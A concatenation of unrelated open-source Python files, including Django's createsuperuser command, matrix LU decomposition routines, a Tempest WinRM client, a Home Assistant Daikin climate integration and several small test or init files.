'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
|
sivaprakashniet/push_pull
|
refs/heads/master
|
p2p/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
131
|
"""
Management utility to create superusers.
"""
from __future__ import unicode_literals
import getpass
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.management import get_default_username
from django.core import exceptions
from django.core.management.base import BaseCommand, CommandError
from django.db import DEFAULT_DB_ALIAS
from django.utils.encoding import force_str
from django.utils.six.moves import input
from django.utils.text import capfirst
class NotRunningInTTYException(Exception):
pass
class Command(BaseCommand):
help = 'Used to create a superuser.'
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.UserModel = get_user_model()
self.username_field = self.UserModel._meta.get_field(self.UserModel.USERNAME_FIELD)
def add_arguments(self, parser):
parser.add_argument('--%s' % self.UserModel.USERNAME_FIELD,
dest=self.UserModel.USERNAME_FIELD, default=None,
help='Specifies the login for the superuser.')
parser.add_argument('--noinput', action='store_false', dest='interactive', default=True,
help=('Tells Django to NOT prompt the user for input of any kind. '
'You must use --%s with --noinput, along with an option for '
'any other required field. Superusers created with --noinput will '
                            'not be able to log in until they\'re given a valid password.' %
self.UserModel.USERNAME_FIELD))
parser.add_argument('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS,
help='Specifies the database to use. Default is "default".')
for field in self.UserModel.REQUIRED_FIELDS:
parser.add_argument('--%s' % field, dest=field, default=None,
help='Specifies the %s for the superuser.' % field)
def execute(self, *args, **options):
self.stdin = options.get('stdin', sys.stdin) # Used for testing
return super(Command, self).execute(*args, **options)
def handle(self, *args, **options):
username = options.get(self.UserModel.USERNAME_FIELD, None)
database = options.get('database')
# If not provided, create the user with an unusable password
password = None
user_data = {}
# Do quick and dirty validation if --noinput
if not options['interactive']:
try:
if not username:
raise CommandError("You must use --%s with --noinput." %
self.UserModel.USERNAME_FIELD)
username = self.username_field.clean(username, None)
for field_name in self.UserModel.REQUIRED_FIELDS:
if options.get(field_name):
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = field.clean(options[field_name], None)
else:
raise CommandError("You must use --%s with --noinput." % field_name)
except exceptions.ValidationError as e:
raise CommandError('; '.join(e.messages))
else:
# Prompt for username/password, and any other required fields.
# Enclose this whole thing in a try/except to catch
# KeyboardInterrupt and exit gracefully.
default_username = get_default_username()
try:
if hasattr(self.stdin, 'isatty') and not self.stdin.isatty():
raise NotRunningInTTYException("Not running in a TTY")
# Get a username
verbose_field_name = self.username_field.verbose_name
while username is None:
input_msg = capfirst(verbose_field_name)
if default_username:
input_msg += " (leave blank to use '%s')" % default_username
username_rel = self.username_field.rel
input_msg = force_str('%s%s: ' % (
input_msg,
' (%s.%s)' % (
username_rel.to._meta.object_name,
username_rel.field_name
) if username_rel else '')
)
username = self.get_input_data(self.username_field, input_msg, default_username)
if not username:
continue
try:
self.UserModel._default_manager.db_manager(database).get_by_natural_key(username)
except self.UserModel.DoesNotExist:
pass
else:
self.stderr.write("Error: That %s is already taken." %
verbose_field_name)
username = None
for field_name in self.UserModel.REQUIRED_FIELDS:
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = options.get(field_name)
while user_data[field_name] is None:
message = force_str('%s%s: ' % (capfirst(field.verbose_name),
' (%s.%s)' % (field.rel.to._meta.object_name, field.rel.field_name) if field.rel else ''))
user_data[field_name] = self.get_input_data(field, message)
# Get a password
while password is None:
if not password:
password = getpass.getpass()
password2 = getpass.getpass(force_str('Password (again): '))
if password != password2:
self.stderr.write("Error: Your passwords didn't match.")
password = None
continue
if password.strip() == '':
self.stderr.write("Error: Blank passwords aren't allowed.")
password = None
continue
except KeyboardInterrupt:
self.stderr.write("\nOperation cancelled.")
sys.exit(1)
except NotRunningInTTYException:
self.stdout.write(
"Superuser creation skipped due to not running in a TTY. "
"You can run `manage.py createsuperuser` in your project "
"to create one manually."
)
if username:
user_data[self.UserModel.USERNAME_FIELD] = username
user_data['password'] = password
self.UserModel._default_manager.db_manager(database).create_superuser(**user_data)
if options['verbosity'] >= 1:
self.stdout.write("Superuser created successfully.")
def get_input_data(self, field, message, default=None):
"""
Override this method if you want to customize data inputs or
validation exceptions.
"""
raw_value = input(message)
if default and raw_value == '':
raw_value = default
try:
val = field.clean(raw_value, None)
except exceptions.ValidationError as e:
self.stderr.write("Error: %s" % '; '.join(e.messages))
val = None
return val
|
maxmalysh/congenial-octo-adventure
|
refs/heads/master
|
report1/task1_compact.py
|
1
|
import numpy as np
from typing import List
from enum import Enum
from scipy import sparse
from random import randint
class PivotMode(Enum):
BY_ROW = 0
BY_COLUMN = 1
BY_MATRIX = 2
SPARSE = 3
def pivot_by_row(A: np.matrix, k: int, rp: List[int]):
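    # Partial pivoting by rows: scan column k below the diagonal (through the
    # row permutation rp) for the largest-magnitude entry and record the swap
    # in rp instead of moving any data.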
mat_size = A.shape[0]
r_max_lead = k
for i in range(k + 1, mat_size):
if abs(A[rp[i], k]) > abs(A[rp[r_max_lead], k]):
r_max_lead = i
if r_max_lead != k:
row_perm_k_saved = rp[k]
rp[k] = rp[r_max_lead]
rp[r_max_lead] = row_perm_k_saved
def pivot_by_column(A: np.matrix, k: int, cp: List[int]):
mat_size = A.shape[0]
c_max_lead = k
for i in range(k + 1, mat_size):
if abs(A[k, cp[i]]) > abs(A[k, cp[c_max_lead]]):
c_max_lead = i
if c_max_lead != k:
column_perm_k_saved = cp[k]
cp[k] = cp[c_max_lead]
cp[c_max_lead] = column_perm_k_saved
def pivot_by_matrix(A: np.matrix, k: int, rp: List[int], cp: List[int]):
mat_size = A.shape[0]
r_max_lead = k
c_max_lead = k
for i in range(k + 1, mat_size):
for j in range(k + 1, mat_size):
if abs(A[rp[i], cp[j]]) > abs(
A[rp[r_max_lead], cp[c_max_lead]]):
r_max_lead = i
c_max_lead = j
if r_max_lead != k:
row_perm_k_saved = rp[k]
rp[k] = rp[r_max_lead]
rp[r_max_lead] = row_perm_k_saved
if c_max_lead != k:
column_perm_k_saved = cp[k]
cp[k] = cp[c_max_lead]
cp[c_max_lead] = column_perm_k_saved
def reverse_permutation(perm: List[int]):
rev_perm = [0] * len(perm)
for i in range(len(perm)):
rev_perm[perm[i]] = i
return rev_perm
def pivot_sparse(A: sparse.dok_matrix, k: int, rp: List[int], cp: List[int]):
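    # Apparent strategy (a sparsity/fill-in aware pivot, sketched from the code):
    # B marks the stored non-zero entries of the active (n-k)x(n-k) submatrix,
    # B_ marks entries that are stored but equal to zero (empty for dense input),
    # and G = B @ B_.T @ B is used as a fill-in score per candidate pivot.
    # Among the candidates with the minimal score (and magnitude above epsilon),
    # the largest-magnitude entry is swapped into position k via rp and cp.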
n = A.shape[0]
B = np.zeros((n - k, n - k),
dtype=np.integer)
B_ = np.zeros((n - k, n - k),
dtype=np.integer)
rp_rev = reverse_permutation(rp)
cp_rev = reverse_permutation(cp)
A_keys = A.keys() if isinstance(A, sparse.spmatrix) else [
x for x in np.ndindex(A.shape) if A[x] != 0
]
for i_permuted, j_permuted in A_keys:
i = rp_rev[i_permuted] - k
j = cp_rev[j_permuted] - k
if i < 0 or j < 0:
continue
if A[i_permuted, j_permuted] != 0:
B[i, j] = 1
else:
B_[i, j] = 1
G = B @ B_.transpose() @ B
epsilon = 1e-08
g_min_idxs = []
A_keys = A.keys() if isinstance(A, sparse.spmatrix) else [
x for x in np.ndindex(A.shape) if A[x] != 0
]
for i_permuted, j_permuted in A_keys:
i = rp_rev[i_permuted] - k
j = cp_rev[j_permuted] - k
if i < 0 or j < 0:
continue
if abs(A[i_permuted, j_permuted]) < epsilon:
continue
if len(g_min_idxs) == 0:
g_min_idxs.append((i, j))
if G[i, j] < G[g_min_idxs[0]]:
g_min_idxs.clear()
g_min_idxs.append((i, j))
elif G[i, j] == G[g_min_idxs[0]]:
g_min_idxs.append((i, j))
if len(g_min_idxs) == 0:
raise ValueError("No non-almost-zero elements in A submatrix")
g_chosen = g_min_idxs[0]
for g_idx in g_min_idxs:
if abs(A[rp[g_idx[0] + k], cp[g_idx[1] + k]]) \
> abs(A[rp[g_chosen[0] + k], cp[g_chosen[1] + k]]):
g_chosen = g_idx
r_chosen_lead = g_chosen[0] + k
c_chosen_lead = g_chosen[1] + k
row_perm_k_saved = rp[k]
rp[k] = rp[r_chosen_lead]
rp[r_chosen_lead] = row_perm_k_saved
column_perm_k_saved = cp[k]
cp[k] = cp[c_chosen_lead]
cp[c_chosen_lead] = column_perm_k_saved
def pivot(A: np.matrix, k: int, mode: PivotMode, rp: List[int], cp: List[int]):
if mode == PivotMode.BY_ROW:
pivot_by_row(A, k, rp)
elif mode == PivotMode.BY_COLUMN:
pivot_by_column(A, k, cp)
elif mode == PivotMode.BY_MATRIX:
pivot_by_matrix(A, k, rp, cp)
elif mode == PivotMode.SPARSE:
pivot_sparse(A, k, rp, cp)
def lu_decompose_pivoting(A: np.matrix, mode: PivotMode):
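    # In-place Crout-style elimination: each pivot row is scaled to the right of
    # the pivot, so U (see lu_extract) comes out unit upper triangular while L
    # keeps the pivots on its diagonal; rp/cp record row/column swaps instead of
    # physically moving data.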
n = A.shape[0]
rp = [i for i in range(n)]
cp = [i for i in range(n)]
for k in range(0, n):
pivot(A, k, mode, rp, cp)
for j in range(k + 1, n):
A[rp[k], cp[j]] /= A[rp[k], cp[k]]
for i in range(k + 1, n):
for j in range(k + 1, n):
A[rp[i], cp[j]] -= A[rp[k], cp[j]] * A[rp[i], cp[k]]
return A, rp, cp
def lpu_decompose(A: np.matrix) -> (np.matrix, np.matrix, np.matrix):
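    # Sketch of what this appears to compute: a Bruhat-style factorisation
    # A = L * P * U with L lower triangular (pivots on its diagonal), U unit
    # upper triangular, and P the matrix left in A after elimination (a
    # permutation matrix when A is nonsingular).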
A = A.copy()
n = A.shape[0]
L = np.identity(A.shape[0])
U = np.identity(A.shape[0])
for k in range(0, n):
nonzero_elems_j_indices = np.nonzero(A[k])[0]
if len(nonzero_elems_j_indices) != 0:
first_nonzero_elem_j = nonzero_elems_j_indices[0]
else:
raise ValueError("Singular matrix provided!")
first_nonzero_elem = A[k, first_nonzero_elem_j]
for j in range(0, n):
A[k, j] /= first_nonzero_elem
L[k, k] = first_nonzero_elem
for s in range(k + 1, n):
multiplier = A[s, first_nonzero_elem_j]
for j in range(0, n):
A[s, j] -= A[k, j] * multiplier
L[s, k] = multiplier
for t in range(first_nonzero_elem_j + 1, n):
multiplier = A[k, t] / A[k, first_nonzero_elem_j]
for i in range(0, n):
A[i, t] -= A[i, first_nonzero_elem_j] * multiplier
U[first_nonzero_elem_j, t] = multiplier
P = A
return L, P, U
def lpl_decompose(A: np.matrix) -> (np.matrix, np.matrix, np.matrix):
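    # Column-reverses A with the anti-identity Q, factors A @ Q via
    # lpu_decompose, and conjugates U back with Q; since Q @ U @ Q is lower
    # triangular this yields an L * P * L'-style decomposition
    # A = L @ (P @ Q) @ Ls.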
Q = np.identity(A.shape[0])
Q = Q[::-1]
L, P, U = lpu_decompose(A @ Q)
Ls = Q @ U @ Q
return L, (P @ Q), Ls
def lu_extract(LU: np.matrix, rp: List[int], cp: List[int]):
mat_size = LU.shape[0]
L = np.zeros((mat_size, mat_size))
U = np.zeros((mat_size, mat_size))
for i in range(mat_size):
for j in range(mat_size):
if j > i:
U[i, j] = LU[rp[i], cp[j]]
elif j < i:
L[i, j] = LU[rp[i], cp[j]]
elif j == i:
L[i, j] = LU[rp[i], cp[j]]
U[i, j] = 1
return L, U
def lr_decompose_pivoting(A: np.matrix, mode: PivotMode):
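    # Doolittle-style variant: the multipliers are stored in the strictly lower
    # part of the working array, so lr_extract later puts ones on L's diagonal
    # and the pivots into R.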
n = A.shape[0]
rp = [i for i in range(n)]
cp = [i for i in range(n)]
for k in range(0, n):
pivot(A, k, mode, rp, cp)
for i in range(k + 1, n):
divider = A[rp[i], cp[k]] / A[rp[k], cp[k]]
A[rp[i], cp[k]] = divider
for j in range(k + 1, n):
A[rp[i], cp[j]] -= A[rp[k], cp[j]] * divider
return A, rp, cp
def lr_extract(LU: np.matrix, rp: List[int], cp: List[int]):
mat_size = LU.shape[0]
L = np.zeros((mat_size, mat_size))
U = np.zeros((mat_size, mat_size))
for i in range(mat_size):
for j in range(mat_size):
if j > i:
U[i, j] = LU[rp[i], cp[j]]
elif j < i:
L[i, j] = LU[rp[i], cp[j]]
elif j == i:
U[i, j] = LU[rp[i], cp[j]]
L[i, j] = 1
return L, U
def perm_vector_to_matrix(vector, row=True):
n = len(vector)
matrix = np.zeros(shape=(n, n))
for i in range(0, n):
if row:
matrix[vector[i], i] = 1
else:
matrix[i, vector[i]] = 1
return matrix
def PLU_decomposition(A):
mode = PivotMode.BY_ROW
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, U
def LUP_decomposition(A):
mode = PivotMode.BY_COLUMN
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return L, U, perm_vector_to_matrix(P_, row=False)
def PLUP_decomposition(A):
mode = PivotMode.BY_MATRIX
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, U, \
perm_vector_to_matrix(P_, row=False)
def PLR_decomposition(A):
mode = PivotMode.BY_ROW
lr_in_one, P, P_ = lr_decompose_pivoting(A.copy(), mode)
L, R = lr_extract(lr_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, R
def Sparse_decomposition(A):
mode = PivotMode.SPARSE
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, U, \
perm_vector_to_matrix(P_, row=False)
|
ritchyteam/odoo
|
refs/heads/master
|
addons/document/wizard/__init__.py
|
444
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import document_configuration
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Conjuror/fxos-certsuite
|
refs/heads/master
|
mcts/utils/handlers/__init__.py
|
25
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
|
zsoltdudas/lis-tempest
|
refs/heads/LIS
|
tempest/common/utils/windows/remote_client.py
|
2
|
#!/usr/bin/python
# Copyright 2014 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from winrm import protocol
LOG = log.getLogger(__name__)
SUCCESS_RETURN_CODE = 0
class WinRemoteClient(object):
def __init__(self, hostname, username, password):
self.hostname = 'https://' + hostname + ':5986/wsman'
self.username = username
self.password = password
def run_wsman_cmd(self, cmd):
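        # Run a single command over WinRM: open a shell on the HTTPS endpoint,
        # execute cmd, collect (stdout, stderr, status code) and clean up.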
protocol.Protocol.DEFAULT_TIMEOUT = "PT3600S"
try:
p = protocol.Protocol(endpoint=self.hostname,
transport='plaintext',
username=self.username,
password=self.password)
shell_id = p.open_shell()
command_id = p.run_command(shell_id, cmd)
std_out, std_err, status_code = p.get_command_output(
shell_id, command_id)
p.cleanup_command(shell_id, command_id)
p.close_shell(shell_id)
return (std_out, std_err, status_code)
except Exception as exc:
LOG.exception(exc)
raise exc
def run_powershell_cmd(self, *args, **kvargs):
list_args = " ".join(args)
kv_args = " ".join(["-%s %s" % (k, v) for k, v in kvargs.iteritems()])
full_cmd = "%s %s %s" % ('powershell', list_args, kv_args)
s_out, s_err, r_code = self.run_wsman_cmd(full_cmd)
if r_code != SUCCESS_RETURN_CODE:
raise Exception("Command execution failed with code %(code)s:\n"
"Command: %(cmd)s\n"
"Output: %(output)s\n"
"Error: %(error)s" % {
'code': r_code,
'cmd': full_cmd,
'output': s_out,
'error': s_err})
LOG.info('Command %(cmd)s result: %(output)s',
{'cmd': full_cmd, 'output': s_out})
return s_out
def get_powershell_cmd_attribute(self, *args, **kvargs):
cmd = args[0]
attribute = args[1]
kv_args = " ".join(["-%s %s" % (k, v) for k, v in kvargs.iteritems()])
full_cmd = "%s (%s %s).%s" % ('powershell', cmd, kv_args, attribute)
s_out, s_err, r_code = self.run_wsman_cmd(full_cmd)
if r_code != SUCCESS_RETURN_CODE:
raise Exception("Command execution failed with code %(code)s:\n"
"Command: %(cmd)s\n"
"Output: %(output)s\n"
"Error: %(error)s" % {
'code': r_code,
'cmd': full_cmd,
'output': s_out,
'error': s_err})
LOG.info('Command %(cmd)s result: %(output)s',
{'cmd': full_cmd, 'output': s_out})
return s_out
|
antepsis/anteplahmacun
|
refs/heads/master
|
sympy/deprecated/class_registry.py
|
26
|
from sympy.core.decorators import deprecated
from sympy.core.core import BasicMeta, Registry, all_classes
class ClassRegistry(Registry):
"""
Namespace for SymPy classes
This is needed to avoid problems with cyclic imports.
To get a SymPy class, use `C.<class_name>` e.g. `C.Rational`, `C.Add`.
For performance reasons, this is coupled with a set `all_classes` holding
the classes, which should not be modified directly.
"""
__slots__ = []
def __setattr__(self, name, cls):
Registry.__setattr__(self, name, cls)
all_classes.add(cls)
def __delattr__(self, name):
cls = getattr(self, name)
Registry.__delattr__(self, name)
# The same class could have different names, so make sure
# it's really gone from C before removing it from all_classes.
if cls not in self.__class__.__dict__.itervalues():
all_classes.remove(cls)
@deprecated(
feature='C, including its class ClassRegistry,',
last_supported_version='1.0',
useinstead='direct imports from the defining module',
issue=9371,
deprecated_since_version='1.0')
def __getattr__(self, name):
return any(cls.__name__ == name for cls in all_classes)
C = ClassRegistry()
C.BasicMeta = BasicMeta
|
starrify/scrapy
|
refs/heads/master
|
tests/CrawlerProcess/asyncio_enabled_reactor.py
|
7
|
import asyncio
from twisted.internet import asyncioreactor
asyncioreactor.install(asyncio.get_event_loop())
import scrapy
from scrapy.crawler import CrawlerProcess
class NoRequestsSpider(scrapy.Spider):
name = 'no_request'
def start_requests(self):
return []
process = CrawlerProcess(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
process.crawl(NoRequestsSpider)
process.start()
|
sdague/home-assistant
|
refs/heads/dev
|
homeassistant/components/daikin/climate.py
|
16
|
"""Support for the Daikin HVAC."""
import logging
import voluptuous as vol
from homeassistant.components.climate import PLATFORM_SCHEMA, ClimateEntity
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
ATTR_HVAC_MODE,
ATTR_PRESET_MODE,
ATTR_SWING_MODE,
HVAC_MODE_COOL,
HVAC_MODE_DRY,
HVAC_MODE_FAN_ONLY,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_BOOST,
PRESET_ECO,
PRESET_NONE,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import ATTR_TEMPERATURE, CONF_HOST, CONF_NAME, TEMP_CELSIUS
import homeassistant.helpers.config_validation as cv
from . import DOMAIN as DAIKIN_DOMAIN
from .const import (
ATTR_INSIDE_TEMPERATURE,
ATTR_OUTSIDE_TEMPERATURE,
ATTR_STATE_OFF,
ATTR_STATE_ON,
ATTR_TARGET_TEMPERATURE,
)
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_HOST): cv.string, vol.Optional(CONF_NAME): cv.string}
)
HA_STATE_TO_DAIKIN = {
HVAC_MODE_FAN_ONLY: "fan",
HVAC_MODE_DRY: "dry",
HVAC_MODE_COOL: "cool",
HVAC_MODE_HEAT: "hot",
HVAC_MODE_HEAT_COOL: "auto",
HVAC_MODE_OFF: "off",
}
DAIKIN_TO_HA_STATE = {
"fan": HVAC_MODE_FAN_ONLY,
"dry": HVAC_MODE_DRY,
"cool": HVAC_MODE_COOL,
"hot": HVAC_MODE_HEAT,
"auto": HVAC_MODE_HEAT_COOL,
"off": HVAC_MODE_OFF,
}
HA_PRESET_TO_DAIKIN = {
PRESET_AWAY: "on",
PRESET_NONE: "off",
PRESET_BOOST: "powerful",
PRESET_ECO: "econo",
}
HA_ATTR_TO_DAIKIN = {
ATTR_PRESET_MODE: "en_hol",
ATTR_HVAC_MODE: "mode",
ATTR_FAN_MODE: "f_rate",
ATTR_SWING_MODE: "f_dir",
ATTR_INSIDE_TEMPERATURE: "htemp",
ATTR_OUTSIDE_TEMPERATURE: "otemp",
ATTR_TARGET_TEMPERATURE: "stemp",
}
DAIKIN_ATTR_ADVANCED = "adv"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up the Daikin HVAC platform.
Can only be called when a user accidentally mentions the platform in their
config. But even in that case it would have been ignored.
"""
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Daikin climate based on config_entry."""
daikin_api = hass.data[DAIKIN_DOMAIN].get(entry.entry_id)
async_add_entities([DaikinClimate(daikin_api)], update_before_add=True)
class DaikinClimate(ClimateEntity):
"""Representation of a Daikin HVAC."""
def __init__(self, api):
"""Initialize the climate device."""
self._api = api
self._list = {
ATTR_HVAC_MODE: list(HA_STATE_TO_DAIKIN),
ATTR_FAN_MODE: self._api.device.fan_rate,
ATTR_SWING_MODE: self._api.device.swing_modes,
}
self._supported_features = SUPPORT_TARGET_TEMPERATURE
if (
self._api.device.support_away_mode
or self._api.device.support_advanced_modes
):
self._supported_features |= SUPPORT_PRESET_MODE
if self._api.device.support_fan_rate:
self._supported_features |= SUPPORT_FAN_MODE
if self._api.device.support_swing_mode:
self._supported_features |= SUPPORT_SWING_MODE
async def _set(self, settings):
"""Set device settings using API."""
values = {}
for attr in [ATTR_TEMPERATURE, ATTR_FAN_MODE, ATTR_SWING_MODE, ATTR_HVAC_MODE]:
value = settings.get(attr)
if value is None:
continue
daikin_attr = HA_ATTR_TO_DAIKIN.get(attr)
if daikin_attr is not None:
if attr == ATTR_HVAC_MODE:
values[daikin_attr] = HA_STATE_TO_DAIKIN[value]
elif value in self._list[attr]:
values[daikin_attr] = value.lower()
else:
_LOGGER.error("Invalid value %s for %s", attr, value)
# temperature
elif attr == ATTR_TEMPERATURE:
try:
values[HA_ATTR_TO_DAIKIN[ATTR_TARGET_TEMPERATURE]] = str(int(value))
except ValueError:
_LOGGER.error("Invalid temperature %s", value)
if values:
await self._api.device.set(values)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._supported_features
@property
def name(self):
"""Return the name of the thermostat, if any."""
return self._api.name
@property
def unique_id(self):
"""Return a unique ID."""
return self._api.device.mac
@property
def temperature_unit(self):
"""Return the unit of measurement which this thermostat uses."""
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self._api.device.inside_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._api.device.target_temperature
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return 1
async def async_set_temperature(self, **kwargs):
"""Set new target temperature."""
await self._set(kwargs)
@property
def hvac_mode(self):
"""Return current operation ie. heat, cool, idle."""
daikin_mode = self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_HVAC_MODE])[1]
return DAIKIN_TO_HA_STATE.get(daikin_mode, HVAC_MODE_HEAT_COOL)
@property
def hvac_modes(self):
"""Return the list of available operation modes."""
return self._list.get(ATTR_HVAC_MODE)
async def async_set_hvac_mode(self, hvac_mode):
"""Set HVAC mode."""
await self._set({ATTR_HVAC_MODE: hvac_mode})
@property
def fan_mode(self):
"""Return the fan setting."""
return self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_FAN_MODE])[1].title()
async def async_set_fan_mode(self, fan_mode):
"""Set fan mode."""
await self._set({ATTR_FAN_MODE: fan_mode})
@property
def fan_modes(self):
"""List of available fan modes."""
return self._list.get(ATTR_FAN_MODE)
@property
def swing_mode(self):
"""Return the fan setting."""
return self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_SWING_MODE])[1].title()
async def async_set_swing_mode(self, swing_mode):
"""Set new target temperature."""
await self._set({ATTR_SWING_MODE: swing_mode})
@property
def swing_modes(self):
"""List of available swing modes."""
return self._list.get(ATTR_SWING_MODE)
@property
def preset_mode(self):
"""Return the preset_mode."""
if (
self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_PRESET_MODE])[1]
== HA_PRESET_TO_DAIKIN[PRESET_AWAY]
):
return PRESET_AWAY
if (
HA_PRESET_TO_DAIKIN[PRESET_BOOST]
in self._api.device.represent(DAIKIN_ATTR_ADVANCED)[1]
):
return PRESET_BOOST
if (
HA_PRESET_TO_DAIKIN[PRESET_ECO]
in self._api.device.represent(DAIKIN_ATTR_ADVANCED)[1]
):
return PRESET_ECO
return PRESET_NONE
async def async_set_preset_mode(self, preset_mode):
"""Set preset mode."""
if preset_mode == PRESET_AWAY:
await self._api.device.set_holiday(ATTR_STATE_ON)
elif preset_mode == PRESET_BOOST:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_BOOST], ATTR_STATE_ON
)
elif preset_mode == PRESET_ECO:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_ECO], ATTR_STATE_ON
)
else:
if self.preset_mode == PRESET_AWAY:
await self._api.device.set_holiday(ATTR_STATE_OFF)
elif self.preset_mode == PRESET_BOOST:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_BOOST], ATTR_STATE_OFF
)
elif self.preset_mode == PRESET_ECO:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_ECO], ATTR_STATE_OFF
)
@property
def preset_modes(self):
"""List of available preset modes."""
ret = [PRESET_NONE]
if self._api.device.support_away_mode:
ret.append(PRESET_AWAY)
if self._api.device.support_advanced_modes:
ret += [PRESET_ECO, PRESET_BOOST]
return ret
async def async_update(self):
"""Retrieve latest state."""
await self._api.async_update()
async def async_turn_on(self):
"""Turn device on."""
await self._api.device.set({})
async def async_turn_off(self):
"""Turn device off."""
await self._api.device.set(
{HA_ATTR_TO_DAIKIN[ATTR_HVAC_MODE]: HA_STATE_TO_DAIKIN[HVAC_MODE_OFF]}
)
@property
def device_info(self):
"""Return a device description for device registry."""
return self._api.device_info
|
111t8e/h2o-2
|
refs/heads/master
|
py/testdir_rpy2/test_expr_rpy2.py
|
8
|
import unittest, random, sys, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_browse as h2b, h2o_exec as h2e, h2o_import as h2i, h2o_cmd, h2o_util
import rpy2.robjects as robjects
import h2o_eqns
import math
print "run some random expressions (using h2o_eqn.py) in exec and R and compare results (eventually)"
exprList = [
]
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1, java_heap_GB=28)
@classmethod
